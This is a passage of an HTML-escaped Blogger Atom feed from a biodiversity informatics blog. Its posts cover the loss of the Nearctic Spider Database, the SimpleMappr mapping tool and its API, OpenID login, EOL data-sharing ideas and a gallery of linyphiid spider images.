The Breeding Group and Seed Storage: A Study in Population Dynamics. &lt;em&gt;Evolution&lt;/em&gt;. &lt;strong&gt;14&lt;/strong&gt;, 238-255.&lt;/p&gt;&lt;br /&gt;Similarly, this can be done with an input box. Paste a reference and press enter:&lt;br /&gt;&lt;input type="text" class="biblio-entry" style="width:90%;display:inline;height:1.5em;line-height:1.5em;" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-2924585229000122690?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/2924585229000122690/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=2924585229000122690' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2924585229000122690'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2924585229000122690'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/08/reference-parser-revived.html' title='Reference Parser Revived'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3405623771239598783</id><published>2010-07-27T07:40:00.003-06:00</published><updated>2010-07-27T07:56:10.211-06:00</updated><title type='text'>Authentication Made Easy</title><content type='html'>I am swamped by the number of user names and passwords I have to remember and, quite frankly, if a new resource I stumble upon requires me 
to remember yet another account for me to access or do something I need, it's a deterrent and I'll go elsewhere. While developing features for &lt;a href="http://www.simplemappr.net/"&gt;SimpleMappr&lt;/a&gt;, it occurred to me that users probably would like to save a template of a naked map and then populate it with various bits of data at various times. In other words, it would be handy to just draw-up a template and use it whenever creating something new. Rather than making yet another user account system (ugh!) for this map template saving tool, I made use of &lt;a href="http://www.janrain.com/"&gt;Janrain&lt;/a&gt;'s (formerly RPX) OpenID system. In less than an hour, I made a 2-click user authentication system for users. While Janrain is a for-profit company, it's only a matter of time for an open-source equivalent at which time I can probably just switch and not have to adjust the database schema or much of my code.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.simplemappr.net/"&gt;&lt;img style="cursor: pointer; width: 320px; height: 201px;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/TE7ksB4VJ4I/AAAAAAAAAJw/FFWZHXlVk7E/s320/Picture+1.png" alt="" id="BLOGGER_PHOTO_ID_5498583640136034178" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3405623771239598783?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3405623771239598783/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3405623771239598783' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3405623771239598783'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3405623771239598783'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/07/authentication-made-easy.html' title='Authentication Made Easy'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/TE7ksB4VJ4I/AAAAAAAAAJw/FFWZHXlVk7E/s72-c/Picture+1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5793570506778107188</id><published>2010-04-05T08:06:00.006-06:00</published><updated>2010-04-05T18:48:59.607-06:00</updated><title type='text'>SimpleMappr API</title><content type='html'>There are plenty of resources to make pushpin maps, but none that I know of have a Microsoft Excel add-on to make use of these. My ultimate goal is to make one as part of &lt;a href="http://www.simplemappr.net/"&gt;SimpleMappr&lt;/a&gt; to help streamline map creation for assembly into manuscripts. 
To get a little closer to this vision, I spent a half-hour making a RESTful API and the documentation may be found here: &lt;a href="http://www.simplemappr.net/#map-api"&gt;http://www.simplemappr.net/#map-api&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;For example, this URL: http://www.simplemappr.net/api/?file=http://www.simplemappr.net/api/demo.txt&amp;amp;shape=square&amp;amp;size=10&amp;amp;color=255,0,0&amp;amp;width=400&amp;amp;bbox=-130,40,-60,50&amp;amp;layers=lakes,stateprovinces&amp;amp;projection=esri:102009&lt;br /&gt;&lt;br /&gt;Gives you this:&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.simplemappr.net/api/?file=http://www.simplemappr.net/api/demo.txt&amp;amp;shape=square&amp;amp;size=10&amp;amp;color=255,0,0&amp;amp;width=400&amp;amp;bbox=-130,40,-60,50&amp;amp;layers=lakes,stateprovinces&amp;amp;projection=esri:102009" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5793570506778107188?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5793570506778107188/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5793570506778107188' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5793570506778107188'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5793570506778107188'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/04/simplemappr-api.html' title='SimpleMappr API'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-377980756496797883</id><published>2010-03-25T19:25:00.004-06:00</published><updated>2010-03-29T09:47:13.813-06:00</updated><title type='text'>Mapping Revival</title><content type='html'>One of the casualties of the death of the Nearctic Spider Database was a largely neglected, simple mapping application that permitted copy/paste of collection coordinates. The output was a b&amp;w line map with contoured dots, mostly suitable for insertion in manuscripts. Sadly deficient was the ability to have many layers, each with different pushpin style or to crop, zoom, pan or change the projection. Unbeknown to me, folks were actually using this thing. I actually made a much better application for the AMNH to help produce outputs for their PBI grant holders. So, with Norm Platnick's permission, I re-purposed some of the code.&lt;br /&gt;&lt;br /&gt;Here be SimpleMappr, &lt;a href="http://www.simplemappr.net"&gt;http://www.simplemappr.net&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.simplemappr.net"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 268px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/S6wOnLHKazI/AAAAAAAAAJo/i61kvoB21ws/s400/Picture+3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5452749314999348018" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There are bound to be bugs or hiccups because it's never been fully tested under load, but I throw it out here for feedback and feature requests. Please let me know what you were doing when and if you witness odd behaviour; this is a very dynamic environment. 
Yes, there are similar sorts of applications out there in the wilds but none to my knowledge permit this sort of facile "copy/paste/tweak/export" as fast as this one can.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-377980756496797883?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/377980756496797883/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=377980756496797883' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/377980756496797883'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/377980756496797883'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/03/mapping-revival.html' title='Mapping Revival'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/S6wOnLHKazI/AAAAAAAAAJo/i61kvoB21ws/s72-c/Picture+3.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8579012457982496150</id><published>2010-03-19T10:20:00.005-06:00</published><updated>2010-03-20T06:39:44.483-06:00</updated><title type='text'>Nearctic Spider Database Dead</title><content type='html'>With great sadness, I will no longer be serving the Nearctic Spider Database unless something remarkable happens.&lt;br /&gt;&lt;br /&gt;On March 17, 2010, the power supply 
sparked in my server, shorted out the motherboard and as a consequence, the hard drives seized up. While I of course have back-ups, unbeknown to me the incremental drive image for the applications portion of the server was corrupt. The latest working drive image was January 2007 - hardly useful to rebuild the server. This means I have to reconstruct the server from bare metal, which would be a significant financial hit and a significant consumption of time away from family.&lt;br /&gt;&lt;br /&gt;The &lt;a href="http://www.canadianarachnology.org"&gt;website currently serves&lt;/a&gt; a flat html page where one may download the code and data until March 31, 2010 at which time it will evaporate.&lt;br /&gt;&lt;br /&gt;I estimate it would take a solid week to re-install and iron-out the kinks. But, if it takes that long, surely it would be better to have a fool-proof system. And, in particular, one NOT dependent on Microsoft software.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_VYUFlXOCOxE/S6QpGlCuA3I/AAAAAAAAAJg/RJtAL9X6YcQ/s1600-h/banner2.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 400px; height: 39px;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/S6QpGlCuA3I/AAAAAAAAAJg/RJtAL9X6YcQ/s400/banner2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5450526642024612722" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8579012457982496150?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8579012457982496150/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8579012457982496150' title='18 Comments'/><link rel='edit' type='application/atom+xml' 
href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8579012457982496150'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8579012457982496150'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/03/nearctic-spider-database-dead.html' title='Nearctic Spider Database Dead'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/S6QpGlCuA3I/AAAAAAAAAJg/RJtAL9X6YcQ/s72-c/banner2.png' height='72' width='72'/><thr:total>18</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-9023003956855484107</id><published>2009-06-14T18:56:00.002-06:00</published><updated>2009-06-14T20:01:52.770-06:00</updated><title type='text'>The Community is Dead</title><content type='html'>This may not be much of a revelation to many, but it is a notion that is sinking home more deeply for me of late. By "Community", I don't necessarily mean the online community, though there are hints of that as well when you think of the MySpace-&gt;Facebook-&gt;Twitter progression from all-out friend fest to ever more insular &amp; individualistic directions; I mean the taxonomic community.&lt;br /&gt;&lt;br /&gt;I lead the &lt;a href="http://www.lifedesks.org"&gt;LifeDesk&lt;/a&gt; application of the Encyclopedia of Life and have been trying to sell the notion of a taxa-centric "community" of taxonomists who want to get their content online in a human- and machine-readable format. Banding together means the workload can be shared, i.e., you gather the images, I'll get the text, she'll get the names in order, and he'll get the bibliography, etc. 
This is a similar approach behind the &lt;a href="http://scratchpads.eu/"&gt;Scratchpad&lt;/a&gt; philosophy. [Aside: there are apparently some who think Scratchpads and LifeDesks are duplicating efforts, but nothing could be further from the truth. Having both means choice and that is a good thing because it strengthens both our directions and is a clear signal to taxonomists that there is something behind this.] While the Scratchpad/LifeDesk community-driven focus may work in a number of situations, it is by no means the rule. Rather, the chances are much greater that taxonomists don't have a taxa-centric community of colleagues to share the workload because in fact, they may be the only one in the world working on their chosen taxa. As a result, the majority of Scratchpads and LifeDesks will be "communities" of single individuals. So, I have been thinking a little more deeply about the Scratchpad/LifeDesk direction and think I see a way forward.&lt;br /&gt;&lt;br /&gt;The clear signal from the Scratchpad/LifeDesks projects is that folks are doing primarily two things: 1) getting a biblio online, and 2) getting taxonomic names in order. These two activities are largely divorced from one another because the workflow leaves a lot to be desired. Both activities are thankless tasks to begin with regardless of the LifeDesks/Scratchpad environment, which adds further insult to the workflow. Why &lt;span style="font-style:italic;"&gt;should&lt;/span&gt; these activities be so independent from one another? Here's what the workflow ought to be:&lt;br /&gt;&lt;br /&gt;1. Upload PDF reprints&lt;br /&gt;2. Look for a DOI &amp; get the metadata from CrossRef. If none found, prompt with citation form (first check for existing paper in db to cut down on duplicates)&lt;br /&gt;3. Scan the PDFs using &lt;a href="http://code.google.com/p/taxon-name-processing/"&gt;TaxonFinder&lt;/a&gt;&lt;br /&gt;4. Present flat lists of names found in individual PDFs&lt;br /&gt;5. 
Drag these into a &lt;a href="http://www.jstree.com/"&gt;jsTree-based&lt;/a&gt; classification manager while retaining the name-reprint link in the background&lt;br /&gt;&lt;br /&gt;This is the workflow that makes sense because when building a classification, one necessarily starts with publications, not some mythical list of names.&lt;br /&gt;&lt;br /&gt;But...&lt;br /&gt;&lt;br /&gt;Does the above make sense in a LifeDesk or a Scratchpad? It could certainly be a cool tool to help lower the bar of entry, but I seriously doubt it would get the traction in the taxonomic "community" that the tool would deserve. Rather, the application is best placed on the desktop as a rich, cross-platform app in &lt;a href="http://www.adobe.com/products/air/"&gt;Adobe AIR&lt;/a&gt; or a similarly facile development environment. Roll in some BitTorrent capabilities (egads!) and you have the start of a mechanism whereby reprints, names AND classifications may be shared and one could walk among the three in various ways. It would work because taxonomists need reprints and names AND there are plenty of residual names in any one reprint (i.e. of use to someone else). If cleverly constructed, reconciliation of names is an insular exercise that happens on the desktop (as it always has been) but the sharing of these reconciliation groups / biblio metadata acts to enhance the findability of reprints.&lt;br /&gt;&lt;br /&gt;Here's the challenge then. Build a service that accepts PDF reprints, finds the DOI (if present) &amp; spits back the citation metadata for each article AND all the names (dedup'd and cleaned) it contains. I don't need any more taxonomic intelligence than that. 
Give it to me in JSON and I can whip up the jsTree-based interface to help individuals build their own reconciliation groups...all linked to reprints in their store.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-9023003956855484107?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/9023003956855484107/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=9023003956855484107' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/9023003956855484107'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/9023003956855484107'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2009/06/community-is-dead.html' title='The Community is Dead'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-206757467995776003</id><published>2008-12-18T22:37:00.004-07:00</published><updated>2008-12-18T22:48:34.904-07:00</updated><title type='text'>Cooliris on Eight Legs</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_VYUFlXOCOxE/SUs03KA_eXI/AAAAAAAAAIg/U5wIXkbI20Q/s1600-h/cool.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 400px; height: 246px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/SUs03KA_eXI/AAAAAAAAAIg/U5wIXkbI20Q/s400/cool.jpg" border="0" 
alt=""id="BLOGGER_PHOTO_ID_5281373110208002418" /&gt;&lt;/a&gt;&lt;br /&gt;For well over a year, I have been serving MediaRSS feeds from the Nearctic Spider Database (before Yahoo and Flickr!) and I am overjoyed to see that all the big guys are jumping on this extension to RSS 2.0. One in particular that blows me away is Cooliris, a plug-in for all modern browsers that allows one to navigate MediaRSS feeds in 3D. So, if you haven't yet downloaded and installed Cooliris, you may do so &lt;a href="http://www.cooliris.com"&gt;HERE&lt;/a&gt;. Then, you're welcome to see the feed of spiders &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/ImageSearch.asp"&gt;HERE&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Maybe I better take a second look at &lt;a href="http://www.rssbus.com/"&gt;RSSBus&lt;/a&gt;...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-206757467995776003?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/206757467995776003/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=206757467995776003' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/206757467995776003'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/206757467995776003'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/12/cooliris-on-eight-legs.html' title='Cooliris on Eight Legs'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/SUs03KA_eXI/AAAAAAAAAIg/U5wIXkbI20Q/s72-c/cool.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5241590768693995557</id><published>2008-11-03T19:20:00.005-07:00</published><updated>2008-11-03T20:23:23.464-07:00</updated><title type='text'>Little E's</title><content type='html'>Because I work for the Encyclopedia of Life (EOL) and because I can tinker on the Nearctic Spider Database, I have the opportunity to try out various approaches to help mobilize data. One thing that concerns me about the current relationship between EOL and its content partners is their near 1:1 relationship. In other words, content partners that come onboard are encouraged to represent their data in one potentially massive XML document much like a Google Sitemap. More information on what EOL would like to see future content partners produce can be found &lt;a href="http://www.eol.org/content/page/help_build_eol"&gt;HERE&lt;/a&gt;. A potential outside consumer of these data will have no idea where to retrieve this XML document. Thus, the relationship between EOL and its content partners is closed. 
That is, until EOL releases some web services.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.canadianarachnology.org/data/spiders/1966"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 372px; height: 400px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/SQ-4yb9mLmI/AAAAAAAAAGE/nTs15-lMTTw/s400/Graphic1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5264629666058481250" /&gt;&lt;/a&gt;So, in an effort to help expose the data structure EOL is looking for, I made a link on every one of the species pages in the Nearctic Spider Database. Upon clicking these "little e's", you can catch a glimpse of what EOL is hoping its content partners will produce. These "little e's" don't really help the relationship between EOL and its array of content partners, nor do they ease the effort on the part of content partners to make these documents, nor do they help us at EOL. So what's the point? What they do is share what I produced for EOL. If you can parse the data behind the "little e's", you can parse the big XML "sitemap" document I made for EOL as well.&lt;br /&gt;&lt;br /&gt;The problem with sitemaps is that no one but the harvester knows where these sitemaps can be found. A Google sitemap, for instance, can be found in any folder on a website that shares a sitemap (but is usually in the root folder and is accessed as /sitemap.xml or /sitemap.gz). This is the same situation for EOL and its content partners; the "sitemap" can be found anywhere.&lt;br /&gt;&lt;br /&gt;To finish off the "little e" approach, each page should have a link to the EOL content partner sitemap document, in which can be found links to all pages with "little e's". This would be somewhat similar to an OpenSearch document, which contains instructions on how to make use of the search feed(s) available on a site. 
And of course, there should be a JSON option for a lighter weight option than XML.&lt;br /&gt;&lt;br /&gt;But, to make this of any use at all, we need a desktop reader like an RSS reader...something with the ability to shunt the data into the correct spot within a rich GUI-based classification (with some degree of certainty), thus forcing us to eventually develop far better online tree browsers. With all the bits described above, you'd come across a species page, click a button like an RSS feed button, download a sitemap containing a list of all species pages on the site you landed on, then browse through the content the way you want it organized.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5241590768693995557?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5241590768693995557/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5241590768693995557' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5241590768693995557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5241590768693995557'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/11/little-es.html' title='Little E&apos;s'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/SQ-4yb9mLmI/AAAAAAAAAGE/nTs15-lMTTw/s72-c/Graphic1.png' 
height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1578203807162097572</id><published>2008-10-18T19:35:00.002-06:00</published><updated>2008-10-18T19:53:15.330-06:00</updated><title type='text'>Google Charts...Wow</title><content type='html'>Kevin Pfeiffer, an avid participant in the &lt;a href="http://forum.canadianarachnology.org/"&gt;Nearctic Arachnologists' Forum&lt;/a&gt;, finally got me to do something about the Flash-based charts on the species pages in the Nearctic Spider Database. While these older charts were great at the time, they've had their day. So, in light of the sparklines that Rod Page integrated into a "&lt;a href="http://iphylo.blogspot.com/2008/10/biodiversity-service-status.html"&gt;Biodiversity Service Status&lt;/a&gt;" pinger, I thought I'd take a closer look at &lt;a href="http://code.google.com/apis/chart/"&gt;Google Charts&lt;/a&gt;. Wow. The added plus for this service is the truly stellar documentation.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_VYUFlXOCOxE/SPqS0qQ3e4I/AAAAAAAAAFs/xhlijbChSb0/s1600-h/chart.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/SPqS0qQ3e4I/AAAAAAAAAFs/xhlijbChSb0/s320/chart.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5258676948304362370" /&gt;&lt;/a&gt;&lt;br /&gt;Rather than using a terribly long URL to get the PNG for the chart, I used a proxy. This way, I can pass the identifier to a local script that then grabs the image and dumps it on the page. 
And, I can give the chart a file name of my choosing.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1578203807162097572?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1578203807162097572/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1578203807162097572' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1578203807162097572'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1578203807162097572'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/10/google-chartswow.html' title='Google Charts...Wow'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/SPqS0qQ3e4I/AAAAAAAAAFs/xhlijbChSb0/s72-c/chart.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6308517379985296518</id><published>2008-10-12T07:57:00.003-06:00</published><updated>2008-10-12T08:49:43.751-06:00</updated><title type='text'>Long Tail of Biodiversity</title><content type='html'>At last count on the World Spider Catalog, there are 4345 species in the spider family &lt;a href="http://research.amnh.org/entomology/spiders/catalog/LINYPHIIDAE.html"&gt;Linyphiidae&lt;/a&gt;. This is second only to the jumping spiders. 
The latter are primarily tropical and subtropical, but linyphiids are predominantly found in the northern hemisphere, where, coincidentally, most of the world's arachnid systematists are also found. And, of course, there's very little accessible information on most of these species either in print or on the web. A few notable exceptions are Tanasevitch's &lt;a href="http://www.andtan.newmail.ru/list/"&gt;Linyphiid Spiders of the World&lt;/a&gt;, which contains flat lists of names organized in various ways, and the ever-popular &lt;a href="http://bugguide.net/node/view/1969"&gt;BugGuide gallery&lt;/a&gt; (few of whose images are identified to species). There is a smattering of other resources out there, but they are all hard to find. Both the &lt;a href="http://tolweb.org/Linyphiidae"&gt;Tree of Life&lt;/a&gt; and the &lt;a href="http://www.eol.org/taxa/16098085"&gt;Encyclopedia of Life&lt;/a&gt; have the equivalent of stub pages, so neither of these is particularly helpful.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s1600-h/new-1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s320/new-1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5256278046553077314" /&gt;&lt;/a&gt;&lt;br /&gt;An effort to unlock these hidden gems is now underway, led by &lt;a href="http://fm1.fieldmuseum.org/aa/staff_page.cgi?staff=sierwald&amp;id=629"&gt;Nina Sandlin&lt;/a&gt;, an Associate of Zoology at the Field Museum in Chicago. She has been building &lt;a href="http://picasaweb.google.com/nina.sandlin/LinEpig#"&gt;LinEpig&lt;/a&gt;, a photo gallery of linyphiid epigyna on Picasa Web Albums. Like most other online work on arachnids, LinEpig is built with love for the organisms and no budget (correct me if I'm wrong, Nina!). 
